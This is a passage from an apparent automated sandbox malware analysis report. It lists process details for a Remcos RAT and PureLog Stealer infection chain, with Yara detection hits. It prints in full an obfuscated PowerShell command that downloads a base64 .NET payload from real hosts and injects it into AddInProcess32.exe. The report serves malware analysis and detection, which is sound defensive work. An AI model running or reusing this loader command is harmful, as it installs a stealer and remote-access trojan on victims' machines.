                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:23:29:38
                              Start date:01/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff68cce0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:6
                              Start time:23:29:39
                              Start date:01/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
                              Imagebase:0x7ff6eb350000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1392660414.00000208F3A4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:23:29:48
                              Start date:01/10/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                              Imagebase:0x4e0000
                              File size:43'008 bytes
                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false
